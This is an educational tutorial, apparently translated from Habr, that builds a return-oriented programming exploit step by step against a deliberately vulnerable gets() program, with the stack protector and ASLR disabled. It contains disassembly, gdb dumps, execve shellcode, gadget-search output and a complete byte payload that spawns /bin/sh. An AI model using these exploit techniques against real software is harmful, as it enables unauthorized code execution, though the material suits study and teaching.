Return-oriented programming: building an exploit piece by piece

Introduction
In this article we will try to figure out how a return-oriented exploit works. The topic is, admittedly, well worn, and there are plenty of publications about it on the internet, but I will try to write this so that it is not just another compilation. Along the way we will have to deal with some system-level details of Linux and the x86-64 architecture (all the experiments described below were performed on Ubuntu 14.04). The main goal is to exploit a trivial gets vulnerability using ROP (return-oriented programming).

Vulnerability
Finding vulnerabilities is, of course, a separate problem, so we will start by inventing a simple one ourselves. The gets() function from the standard C library, for example, is one big vulnerability, and that is what we will use.

#include <stdio.h>
#include <string.h>

int func() {
    int val = 0;
    char buf[10];
    gets(buf);
    printf("%s\n", buf);
    val = strlen(buf);
    return val;
}

int main(int argc, char **argv) {
    return func();
}

This code reads everything it sees on stdin until it hits a newline or end of file, without ever checking the size of the destination buffer. Generally speaking, using this function is strongly discouraged, and it exists only for backward compatibility. Still, I have often seen fairly recent code that uses it. Oh well. Let's try to compile (we will discuss the purpose of -fno-stack-protector later).

 gcc -o main main.c -g -Wall -fno-stack-protector

gcc warns us twice about the folly of what we are doing (other gcc builds may not print these messages):

 main.c: In function 'func':
 main.c:7:2: warning: 'gets' is deprecated (declared at /usr/include/stdio.h:638) [-Wdeprecated-declarations]
   gets(buf);
   ^
 /tmp/ccBFHgPN.o: In function `func':
 /home/alexhoppus/Desktop/rop_tutorial/main.c:7: warning: the `gets' function is dangerous and should not be used.

Well, let's find out what all this talk of "dangerous" and "deprecated" is about.

Smash the stack
From the code above it is clear that there is a buffer into which the string is read, and that the buffer lives on the stack. As you know, the stack is nothing more than a region of read-write memory in the application's address space. Let's reconstruct its layout on x86-64. We will do this with the objdump utility and then check the result with gdb.

 objdump -d main

 00000000004005bd <func>:
   4005bd: 55                      push   %rbp
   4005be: 48 89 e5                mov    %rsp,%rbp
   4005c1: 48 83 ec 10             sub    $0x10,%rsp
   4005c5: c7 45 fc 00 00 00 00    movl   $0x0,-0x4(%rbp)
   4005cc: 48 8d 45 f0             lea    -0x10(%rbp),%rax
   4005d0: 48 89 c7                mov    %rax,%rdi
   4005d3: e8 e8 fe ff ff          callq  4004c0 <gets@plt>
   4005d8: 48 8d 45 f0             lea    -0x10(%rbp),%rax
   4005dc: 48 89 c7                mov    %rax,%rdi
   4005df: e8 9c fe ff ff          callq  400480 <puts@plt>
   4005e4: 48 8d 45 f0             lea    -0x10(%rbp),%rax
   4005e8: 48 89 c7                mov    %rax,%rdi
   4005eb: e8 a0 fe ff ff          callq  400490 <strlen@plt>
   4005f0: 89 45 fc                mov    %eax,-0x4(%rbp)
   4005f3: 8b 45 fc                mov    -0x4(%rbp),%eax
   4005f6: c9                      leaveq
   4005f7: c3                      retq

 00000000004005f8 <main>:
   4005f8: 55                      push   %rbp
   4005f9: 48 89 e5                mov    %rsp,%rbp
   4005fc: 48 83 ec 10             sub    $0x10,%rsp
   400600: 89 7d fc                mov    %edi,-0x4(%rbp)
   400603: 48 89 75 f0             mov    %rsi,-0x10(%rbp)
   400607: b8 00 00 00 00          mov    $0x0,%eax
   40060c: e8 ac ff ff ff          callq  4005bd <func>
   400611: c9                      leaveq
   400612: c3                      retq
   400613: 66 2e 0f 1f 84 00 00    nopw   %cs:0x0(%rax,%rax,1)
   40061a: 00 00 00
   40061d: 0f 1f 00                nopl   (%rax)

Let's start with the instruction in main that calls func (40060c). callq can be thought of as pushing the return address (400611) and jumping to func, so the return address is the first thing to land on the stack. Once in func, we push %rbp, the base address of the previous stack frame. Next we grow the stack by 16 bytes (the stack grows downward) and zero the 4 bytes just below the saved %rbp; evidently this is our variable val. gets receives a pointer to the buffer in the %rdi register, computed by lea -0x10(%rbp),%rax. The picture can be summarized as follows:
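As a textual stand-in for a drawing, the frame layout described above can be written down as offsets from %rbp. This is only a sketch: the offsets are read off the disassembly, while the dictionary and the helper name bytes_until are illustrative and not part of the original program.

```python
# Offsets relative to %rbp inside func(), read off the disassembly above.
FRAME = {
    "buf": -0x10,            # lea -0x10(%rbp),%rax
    "val": -0x4,             # movl $0x0,-0x4(%rbp)
    "saved_rbp": 0x0,        # stored by "push %rbp"
    "return_address": 0x8,   # stored by "callq func" in main
}


def bytes_until(slot, start="buf"):
    """How many bytes gets() writes from `start` before it reaches `slot`."""
    return FRAME[slot] - FRAME[start]


# Print the frame from high addresses to low, the direction the stack grows.
for name, offset in sorted(FRAME.items(), key=lambda item: item[1], reverse=True):
    print(f"%rbp{offset:+#05x}  {name}")

print("bytes before saved %rbp:", bytes_until("saved_rbp"))
print("bytes before return address:", bytes_until("return_address"))
```

The second number is the amount of padding an input needs before it starts to overwrite the return address.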

From the picture we can conclude that if we write a string longer than 15 characters (plus 1 byte for the terminating NUL) into the buffer, the application will most likely crash, because we overwrite the saved %rbp, the base address of the previous stack frame. We will still return from func to main normally, but then the trouble starts: main will think its stack frame is somewhere it is not, the return address destined for %rip will be read from the wrong place, and the Linux kernel will send us SIGSEGV when we touch or return to a bad address.
Now let's look at the stack through gdb:

 python -c "print 'a'*15" > input2
 gdb ./main
 (gdb) b func
 Breakpoint 1 at 0x4005c5: file main.c, line 5.
 (gdb) r < input2
 (gdb) info register
 ...
 rsp            0x7fffffffde90   0x7fffffffde90
 ...
 (gdb) x/100x 0x7fffffffde90
 0x7fffffffde90: 0x61616161 0x61616161 0x61616161 0x00616161
 0x7fffffffdea0: 0xffffdec0 0x00007fff 0x00400611 0x00000000
 0x7fffffffdeb0: 0xffffdfa8 0x00007fff 0x00000000 0x00000001
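gdb prints the memory as little-endian 32-bit words, so the 64-bit saved %rbp and return address each span two columns. A small sketch that reassembles the first two rows of the dump (the variable names are mine; the values are copied from the gdb output):

```python
import struct

# 32-bit words exactly as gdb printed them, starting at 0x7fffffffde90 (buf).
words = [
    0x61616161, 0x61616161, 0x61616161, 0x00616161,  # 16 bytes from buf up to saved %rbp
    0xffffdec0, 0x00007fff,                          # saved %rbp (low word first)
    0x00400611, 0x00000000,                          # return address (low word first)
]

# Re-create the raw bytes in memory order, then re-read them as 64-bit values.
raw = struct.pack("<8I", *words)
buf_bytes = raw[:16]
saved_rbp, return_addr = struct.unpack("<2Q", raw[16:32])

print(buf_bytes)
print(hex(saved_rbp), hex(return_addr))
```

The return address decodes to 0x400611, the instruction right after callq in main, which agrees with the disassembly.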

Now we can finally be sure that we were not mistaken. Try feeding more than 15 characters to stdin and make sure the application receives SIGSEGV. Now it is time to return to the -fno-stack-protector option. Repeat the trick without it (note: in my gcc build the stack protector is enabled by default; in yours it may not be).

 gcc -o main main.c -g -Wall
 python -c "print 'a'*26" | ./main
 aaaaaaaaaaaaaaaaaaaaaaaaaa
 *** stack smashing detected ***: ./main terminated
 Aborted (core dumped)

The -fstack-protector flag tells gcc to emit buffer overflow protection. The principle is simple: a guard value (the canary, read from %fs:0x28 at run time) is placed on the stack between the writable buffer and the saved %rbp and return address; just before the function returns, the value is read back from the stack and compared with the original. If the two do not match, we see the stack smashing message. You can see for yourself how stack canaries work by looking at the objdump -d disassembly:

 000000000040062d <func>:
 ...
   400635: 64 48 8b 04 25 28 00    mov    %fs:0x28,%rax
   40063c: 00 00
   40063e: 48 89 45 f8             mov    %rax,-0x8(%rbp)
 ...
   400675: 48 8b 55 f8             mov    -0x8(%rbp),%rdx
   400679: 64 48 33 14 25 28 00    xor    %fs:0x28,%rdx
   400680: 00 00
   400682: 74 05                   je     400689 <func+0x5c>
   400684: e8 77 fe ff ff          callq  400500 <__stack_chk_fail@plt>
   400689: c9                      leaveq
   40068a: c3                      retq
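The check in the epilogue above can be imitated with a toy model. This is not how gcc implements it, only a simulation under simplifying assumptions: the frame is a byte array, the buffer is 8 bytes and sits directly below the canary, and the function name call_func is hypothetical.

```python
import os
import struct


def call_func(user_input, canary):
    """Toy model of a protected func(); returns True if the canary survived.

    Simplified frame, low to high addresses:
    buf[8] | canary | saved rbp | return address
    """
    frame = bytearray(8) + struct.pack("<QQQ", canary, 0x7fffffffdec0, 0x400611)
    # gets() copies without a bounds check: model it as an unchecked write
    # of the input plus its terminating NUL, starting at buf.
    data = user_input + b"\x00"
    frame[0:len(data)] = data
    # Epilogue: reload the value stored at the canary slot and compare.
    (stored,) = struct.unpack_from("<Q", frame, 8)
    return stored == canary


# A fresh random canary per run, standing in for the value at %fs:0x28.
canary = struct.unpack("<Q", os.urandom(8))[0]
print("short input ok:", call_func(b"a" * 7, canary))
print("long input ok:", call_func(b"a" * 26, canary))
```

A long input has to run over the canary before it can reach the saved %rbp and the return address, which is why the overflow is noticed before the corrupted return address is ever used.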

To make life easier when writing the ROP exploit, we will compile the application with the -fno-stack-protector flag. This is the first of two protection mechanisms that we will deliberately switch off for simplicity.

Address space layout randomization
Before talking about ASLR, it is worth getting to the point. As you understand, an attacker can overflow a buffer on the stack and overwrite the return address in order to jump to arbitrary code. The question remains: where to jump, and where does the attacker's code come from? Placing code on the stack will not work, because the stack is not executable. This is enforced at the level of the page tables that form the process's virtual address space; in other words, the page table entries for the stack do not grant execute permission. What you can do is jump into the mapped libraries, or rather into small pieces of code inside them. Return-oriented programming is based on this principle. To make it impossible to guess in advance the address at which a library is mapped, and therefore the address of a specific piece of code in it, the position of the library in the process's address space is randomized when the application starts. This is a Linux kernel feature, controlled through procfs:

 echo 0 > /proc/sys/kernel/randomize_va_space

For simplicity, we will have to disable this as well (writing to this file requires root).
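Before running the experiments it is worth checking which mode is actually in effect. A minimal sketch that reads the same procfs file and interprets its value; the helper name describe_aslr is mine, and the descriptions paraphrase the kernel's sysctl documentation:

```python
from pathlib import Path

# Meaning of the values accepted by kernel.randomize_va_space.
ASLR_MODES = {
    0: "disabled",
    1: "stack, mmap base and vDSO randomized",
    2: "as 1, plus the heap (brk) randomized",
}


def describe_aslr(raw_value):
    """Translate the content of randomize_va_space into a description."""
    return ASLR_MODES.get(int(raw_value.strip()), "unknown")


path = Path("/proc/sys/kernel/randomize_va_space")
if path.exists():  # only present on Linux
    print("ASLR:", describe_aslr(path.read_text()))
```

For the rest of this article the expected answer is "disabled".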

Exec /bin/sh
So, the vulnerable application is built without stack overflow protection, and ASLR is disabled. Now, to demonstrate the vulnerability, let's force the victim process to exec /bin/sh in place of itself. First we need to picture what the exploit code should look like:

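 section .text
 global _start
 _start:
     mov rax, 0x3b      ; system call number of execve
     mov rdi, cmd       ; 1st argument: path to the program
     mov rsi, 0         ; 2nd argument: argv = NULL
     mov rdx, 0         ; 3rd argument: envp = NULL
     syscall
 section .data
 cmd: db '/bin/sh', 0   ; explicit NUL terminator for the path
 .end: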

Everything is simple here: on x86-64, application code makes a system call with the syscall instruction. The system call number (0x3b, execve) goes into %rax, and the arguments go into the registers %rdi, %rsi, %rdx, and so on. If you have forgotten what the execve argument list looks like, see the execve(2) man page.
Check that the shell is invoked:

 nasm -f elf64 exec1.S -o exec.o
 ld -o exec exec.o
 ./exec

Gadgets
Generally speaking, a gadget is just a piece of library or application code. We will search for gadgets for our future exploit in libc. To begin with, let's find out at what address the libc code section is mapped. To do this, stop the application in main with gdb and run:

 cat /proc/`pidof main`/maps | grep libc | grep r-xp

What matters to us here is the "x" flag in the mapping, which tells us that this is the executable region.

 7ffff7a14000-7ffff7bcf000 r-xp 00000000 08:01 466797 /lib/x86_64-linux-gnu/libc-2.19.so
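If you would rather extract the base address programmatically than read it by eye, the maps format is easy to parse. A minimal sketch; the function names parse_maps_line and libc_text_base are illustrative, and the sample line is the one shown above:

```python
def parse_maps_line(line):
    """Split one /proc/<pid>/maps line into (start, end, perms, path)."""
    fields = line.split(None, 5)  # the path may itself contain spaces
    start, end = (int(part, 16) for part in fields[0].split("-"))
    perms = fields[1]
    path = fields[5].strip() if len(fields) > 5 else ""
    return start, end, perms, path


def libc_text_base(maps_text):
    """Return the start of the first executable libc mapping, or None."""
    for line in maps_text.splitlines():
        if not line.strip():
            continue
        start, _end, perms, path = parse_maps_line(line)
        if "x" in perms and "libc" in path:
            return start
    return None


sample = ("7ffff7a14000-7ffff7bcf000 r-xp 00000000 08:01 466797 "
          "/lib/x86_64-linux-gnu/libc-2.19.so")
print(hex(libc_text_base(sample)))
```

On a live system the same function can be fed the content of /proc/<pid>/maps for the stopped process.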

Conceptually, the behavior of the future exploit is shown in the following figure:

We start by placing addr1 on the stack in place of the return address; it points to the first gadget in the libc code. The first gadget executes pop %rax, loading the value 0x3b that we prepared on the stack into the %rax register, and then ret takes the address addr2 from the stack and jumps to it. As for 0x601000, it is the start address of the rw region (data section) of the ./main executable:

 00400000-00401000 r-xp 00000000 08:01 527064 /home/alexhoppus/Desktop/rop_tutorial/main
 00600000-00601000 r--p 00000000 08:01 527064 /home/alexhoppus/Desktop/rop_tutorial/main
 00601000-00602000 rw-p 00001000 08:01 527064 /home/alexhoppus/Desktop/rop_tutorial/main

We pick this address as the place to store the string "/bin/sh" (7 characters plus the terminating NUL, so it fits exactly into one 8-byte register). We load the string itself into the %rdx register and its address into %rdi.

 mov qword [rdi], rdx

This instruction writes "/bin/sh" to 0x601000. The main work is done: the rest of the chain zeroes the %rsi and %rdx registers (the second and third execve arguments) and executes syscall. Thus, in seven returns we have exec'ed the unsuspecting main and turned it into /bin/sh.
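To convince yourself that the chain really leaves the registers in the state execve expects, it can be walked through by hand or with a tiny interpreter. The sketch below is a model, not an emulator of real libc code: the addresses are copied from the final payload in this article, only the first one is confirmed by the gadget listing as "pop rax ; ret", and the roles of the others are assumptions inferred from the description above.

```python
import struct

POP_RAX = 0x7ffff7a2d3b8   # pop rax ; ret (confirmed by the gadget listing)
POP_RDI = 0x7ffff7a36a21   # assumed: pop rdi ; ret
POP_RDX = 0x7ffff7a15b8e   # assumed: pop rdx ; ret
STORE = 0x7ffff7a33c27     # assumed: mov qword [rdi], rdx ; ret
POP_RSI = 0x7ffff7b4a114   # assumed: pop rsi ; ret
SYSCALL = 0x7ffff7ad68d5   # assumed: syscall

POPS = {POP_RAX: "rax", POP_RDI: "rdi", POP_RDX: "rdx", POP_RSI: "rsi"}


def run_chain(stack):
    """Interpret the stack the way the CPU would, one `ret` at a time."""
    stack = list(stack)
    regs = {"rax": 0, "rdi": 0, "rsi": 0, "rdx": 0}
    memory = {}
    returns = 0
    while stack:
        target = stack.pop(0)  # ret: pop the next address into %rip
        returns += 1
        if target in POPS:
            regs[POPS[target]] = stack.pop(0)  # pop reg: consume one stack slot
        elif target == STORE:
            memory[regs["rdi"]] = struct.pack("<Q", regs["rdx"])
        elif target == SYSCALL:
            return regs, memory, returns
        else:
            raise ValueError(f"unknown gadget {target:#x}")
    raise ValueError("chain ended without reaching syscall")


BIN_SH = struct.unpack("<Q", b"/bin/sh\x00")[0]
chain = [POP_RAX, 0x3b, POP_RDI, 0x601000, POP_RDX, BIN_SH, STORE,
         POP_RSI, 0, POP_RDX, 0, SYSCALL]
regs, memory, returns = run_chain(chain)
print(regs, memory, returns)
```

The first return counted here is the retq of func itself, which is what hands control to the first gadget.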
How to find gadgets
In fact, there are many utilities that analyze library or application code and hand you a set of ready-made gadgets together with their addresses. This article uses rp-lin-x64 to search for gadgets. Example output of the gadget finder:

 ./rp-lin-x64 -f /lib/x86_64-linux-gnu/libc-2.19.so -r 2 | grep "pop rax"
 ...
 0x0019d345: pop rax ; out dx, al ; jmp qword [rdx] ; (1 found)
 0x000fafb9: pop rax ; pop rdi ; call rax ; (1 found)
 0x000193b8: pop rax ; ret ; (1 found)
 0x001a09c8: pop rax ; adc al, 0xF1 ; jmp qword [rax] ; (1 found)
 ...

To get the real addresses of the gadgets in memory, add to the addresses in the output an offset equal to the start address of the executable libc mapping (see above): 0x7ffff7a14000.
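As a worked example of this arithmetic, here is the "pop rax ; ret" gadget from the listing above rebased and encoded the way it has to appear on the stack. The helper names rebase and p64 are mine; the base and the offset come from the article.

```python
import struct

LIBC_TEXT_BASE = 0x7ffff7a14000  # start of the r-xp libc mapping shown earlier


def rebase(offset, base=LIBC_TEXT_BASE):
    """Turn a gadget offset reported by the finder into a run-time address."""
    return base + offset


def p64(value):
    """Encode a 64-bit value as 8 little-endian bytes, as it sits in memory."""
    return struct.pack("<Q", value)


pop_rax = rebase(0x000193b8)  # "pop rax ; ret" from the listing
print(hex(pop_rax))
print(p64(pop_rax))
```

The resulting 8 bytes are what goes into the payload in place of the original return address.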

And what is the result?
After you have found all the necessary gadgets, you will end up with something like this:

 python -c "print 'a'*24+'\xb8\xd3\xa2\xf7\xff\x7f\x00\x00'+'\x3b\x00\x00\x00\x00\x00\x00\x00'+'\x21\x6a\xa3\xf7\xff\x7f\x00\x00'+'\x00\x10\x60\x00\x00\x00\x00\x00'+'\x8e\x5b\xa1\xf7\xff\x7f\x00\x00'+'\x2f\x62\x69\x6e\x2f\x73\x68\x00'+'\x27\x3c\xa3\xf7\xff\x7f\x00\x00'+'\x14\xa1\xb4\xf7\xff\x7f\x00\x00'+'\x00\x00\x00\x00\x00\x00\x00\x00'+'\x8e\x5b\xa1\xf7\xff\x7f\x00\x00'+'\x00\x00\x00\x00\x00\x00\x00\x00'+'\xd5\x68\xad\xf7\xff\x7f\x00\x00'" | ./main
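The one-liner is hard to read, so here is a sketch of how the same bytes could be assembled step by step. It is written for Python 3, whereas the command above uses Python 2 syntax. The addresses are exactly those in the command; the comments naming the gadgets (other than the first) are my reading of the article's description, not something the listing confirms.

```python
import struct


def p64(value):
    """Encode a 64-bit value as 8 little-endian bytes."""
    return struct.pack("<Q", value)


def build_payload():
    padding = b"a" * 24          # 16 bytes up to saved %rbp + 8 bytes over it
    chain = [
        p64(0x7ffff7a2d3b8),     # pop rax ; ret
        p64(0x3b),               # execve system call number
        p64(0x7ffff7a36a21),     # assumed: pop rdi ; ret
        p64(0x601000),           # start of the rw region of ./main
        p64(0x7ffff7a15b8e),     # assumed: pop rdx ; ret
        b"/bin/sh\x00",          # the string itself, 8 bytes
        p64(0x7ffff7a33c27),     # assumed: mov qword [rdi], rdx ; ret
        p64(0x7ffff7b4a114),     # assumed: pop rsi ; ret
        p64(0),                  # argv = NULL
        p64(0x7ffff7a15b8e),     # assumed: pop rdx ; ret
        p64(0),                  # envp = NULL
        p64(0x7ffff7ad68d5),     # assumed: syscall
    ]
    return padding + b"".join(chain)


payload = build_payload()
print(len(payload), "bytes")
```

To feed it to ./main from Python 3, write payload followed by a newline with sys.stdout.buffer.write rather than print, so that the bytes are not re-encoded as text. NUL bytes in the payload are not a problem, because gets stops only at a newline or end of file.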

Check with strace that the shell really is started. If everything was done correctly, /bin/sh will start and exit immediately, because its stdin is already empty. For obvious reasons, in real conditions nobody is going to connect this shell's stdin to a keyboard, but we can allow ourselves a small hack to check that the exploit works:

 alexhoppus@hp:~/Desktop/rop_tutorial$ cat <(python -c "print 'a'*24+'\xb8\xd3\xa2\xf7\xff\x7f\x00\x00'+'\x3b\x00\x00\x00\x00\x00\x00\x00'+'\x21\x6a\xa3\xf7\xff\x7f\x00\x00'+'\x00\x10\x60\x00\x00\x00\x00\x00'+'\x8e\x5b\xa1\xf7\xff\x7f\x00\x00'+'\x2f\x62\x69\x6e\x2f\x73\x68\x00'+'\x27\x3c\xa3\xf7\xff\x7f\x00\x00'+'\x14\xa1\xb4\xf7\xff\x7f\x00\x00'+'\x00\x00\x00\x00\x00\x00\x00\x00'+'\x8e\x5b\xa1\xf7\xff\x7f\x00\x00'+'\x00\x00\x00\x00\x00\x00\x00\x00'+'\xd5\x68\xad\xf7\xff\x7f\x00\x00'") - | ./main
 aaaaaaaaaaaaaaaaaaaaaaaa Ӣ
 ls
 Blank Flowchart - New Page (2).jpeg article~ exec1.S input main.c shell a.out exec hello input2 rop.jpeg stack.jpeg article

Well, that's all. I hope this article gives you a basis for further experiments (educational and scientific ones, not practical ones).

Source: https://habr.com/ru/post/255519/
